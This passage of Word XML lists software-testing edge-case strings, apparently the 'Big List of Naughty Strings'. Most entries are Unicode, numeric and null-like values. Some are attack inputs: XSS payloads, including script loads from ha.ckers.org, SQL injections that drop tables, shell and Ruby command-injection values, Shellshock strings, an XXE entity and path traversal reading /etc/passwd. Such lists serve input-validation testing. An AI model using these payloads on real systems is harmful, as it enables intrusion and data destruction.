        <w:t xml:space="preserve">=alert("220")&gt; | &lt;SCRIPT/SRC="http://ha.ckers.org/xss.js"&gt;&lt;/SCRIPT&gt; | &lt;&lt;SCRIPT&gt;alert("221");//&lt;&lt;/SCRIPT&gt; | &lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt; | &lt;SCRIPT SRC=//ha.ckers.org/.j&gt; | &lt;IMG SRC="javascript:alert('222')" | &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt; | \";alert('223');// | &lt;u oncopy=alert()&gt; Copy me&lt;/u&gt; | &lt;i onwheel=alert(224)&gt; Scroll over me &lt;/i&gt; | &lt;plaintext&gt; | http://a/%%30%30 | &lt;/textarea&gt;&lt;script&gt;alert(225)&lt;/script&gt; | 1;DROP TABLE users | 1'; DROP TABLE users-- 1 | ' OR 1=1 -- 1 | ' OR '1'='1 | '; EXEC sp_MSForEachTable 'DROP TABLE ?'; -- |   | % | _ | - | -- | --version | --help | $USER | /dev/null; touch /tmp/blns.fail ; echo | </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">touch /tmp/blns.fail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">| $(touch /tmp/blns.fail) | @{[system "touch /tmp/blns.fail"]} | eval("puts 'hello world'") | System("ls -al /") |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ls -al /` | Kernel.exec("ls -al /") | Kernel.exit(1) | %x(‘ls -al /') | &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt; | $HOME | $ENV{‘HOME’} | %d | %s%s%s%s%s | {0} | %*.*s | %@ | %n | File:/// | ../../../../../../../../../../../etc/passwd%00 | ../../../../../../../../../../../etc/hosts | () { 0; }; touch /tmp/blns.shellshock1.fail; | () { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; } &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[$($())] { touch /tmp/blns.shellshock2.fail; } | &lt;&lt;&lt; %s(un='%s’) = %u | +++ATH0 | CON | PRN | AUX | CLOCK$ | NUL | A: | ZZ: | COM1 | LPT1 | LPT2 | LPT3 | COM2 | COM3 | COM4 | DCC SEND STARTKEYLOGGER 0 0 0 | Scunthorpe General Hospital | Penistone Community Church | Lightwater Country Park | Jimmy Clitheroe | Horniman Museum | shitake mushrooms | RomansInSussex.co.uk | http://www.cum.qc.ca/ | Craig Cockburn, Software Specialist | Linda Callahan | Dr. Herman I. Libshitz | magna cum laude | Super Bowl XXX | medieval erection of parapets | evaluate | mocha | expression | Arsenal canal | classic | Tyson Gay | Dick Van Dyke | basement | If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. | Roses are 0;31mred0m, violets are 0;34mblue. Hope you enjoy terminal hue | But now...20Cfor my greatest trick...8m | The quick brown fox… [Beeeep] | Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | 🏳0🌈️ | జ్ఞ‌ా | گچپژ | {% print ‘x’ * 64 * 1024**3 %} | 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 | En dash – | Em dash — | Horizontal bar ― | Figure dash ‒ | Swung dash ⁓ | Single opening quote ‘ | Single closing quote ’ | Double opening quote “ | Double closing quote ” | Copyright © | Registered ® | Trademark ™ | Section § | Paragraph ¶ | Ellipsis … | Optional hyphen ¬ | Non-breaking hyphen ߛ | Em space ߓ | En space ߒ | Quarter space ߕ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">undefined</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">undef</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(null)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NIL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None</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">hasOwnProperty</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">constructor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">$1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1/2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1E2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1E02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1E+02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-$1.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1/2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1E2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1E02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1E+02</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-2147483648/-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-9223372036854775808/-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">+0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">+0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0..0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,0,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.0/0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.0/0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0.0/0.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1,0/0,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0,0/0,0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">NaN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Infinity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-Infinity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">INF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#INF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">-1#IND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#QNAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#SNAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1#IND</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0x0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0xffffffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0xffffffffffffffff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0xabad1dea</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">123456789012345678901234567890123456789</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1,000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1,000,000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000 000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000'000.00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1.000.000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1 000 000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">1'000'000,00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">01000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">09</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">2.2250738585072011e-308</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">,./;'[]-=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;&gt;?:"|_+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">!@#$%^&amp;*()`~</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">\t \u0085             ​\u2028\u2029</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">﻿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ω≈ç√∫˜µ≤≥÷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">åß∂ƒ©˙∆˚¬…æ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">œ∑´®†¥¨ˆøπ“‘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">¡™£¢∞§¶•ªº–≠</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">¸˛Ç◊ı˜Â¯˘¿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ÅÍÎÏ˝ÓÔÒÚÆ☃</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Œ„´‰ˇÁ¨ˆØ∏”’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">`⁄€‹›ﬁﬂ‡°·‚—±</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⅛⅜⅝⅞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">٠١٢٣٤٥٦٧٨٩</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⁰⁴⁵</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">₀₁₂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⁰⁴⁵₀₁₂</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‘"’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“''''"'”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“'"'"''''”</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;foo val=`bar' /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">田中さんにあげて下さい</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">パーティーへ行かないか</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">和製漢語</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">部落格</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">사회과학원 어학연구소</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">찦차를 타고 온 펲시맨과 쑛다리 똠방각하</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">社會科學院語學研究所</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">울란바토르</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𠜎𠜱𠝹𠱓𠱸𠲖𠳏</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ポ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">あ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">鷗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Œ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">é</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ｂ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">逍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ü</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ß</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ª</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ą</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ñ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">丂</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">㐀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𠀀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ⱥ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ⱦ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(｡◕ ∀ ◕｡)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">｀ｨ(´∀｀∩</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">__ﾛ(,_,*)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">・(￣∀￣)・:*:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">(╯°□°）╯︵ ┻━┻)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">(ﾉಥ益ಥ）ﾉ﻿ ┻━┻</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">┬─┬ノ( º _ ºノ)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">( ͡° ͜ʖ ͡°)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">¯_(ツ)_/¯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">😍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👩🏽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👾 🙇 💁 🙅 🙆 🙋 🙎 🙍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🐵 🙈 🙉 🙊</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🇺🇸🇷🇺🇸🇦🇫🇦🇲</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">🇺🇸🇷🇺🇸🇦</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">１２３</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">١٢٣</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">הָיְתָהtestالصفحات التّحول</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">﷽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">ﷺ</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">الكل في المجمو عة (5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">᚛                 ᚜</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‪‪test‪</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">‫test‫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"> test </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">test⁠test‫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⁦test⁧</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮</w:t>
      </w:r>
    </w:p>
    <w:p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r>
        <w:t xml:space="preserve">00˙Ɩ$-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">scriptalert(1);/script</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">"&gt;&lt;script&gt;alert(4)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;alert(5)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt; / script &gt;&lt; script &gt;alert(8)&lt; / script &gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">onfocus=JaVaSCript:alert(9) autofocus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">" onfocus=JaVaSCript:alert(10) autofocus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">' onfocus=JaVaSCript:alert(11) autofocus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">＜script＞alert(12)＜/script＞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">&lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">–&gt;&lt;script&gt;alert(14)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">“;alert(15);t=”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
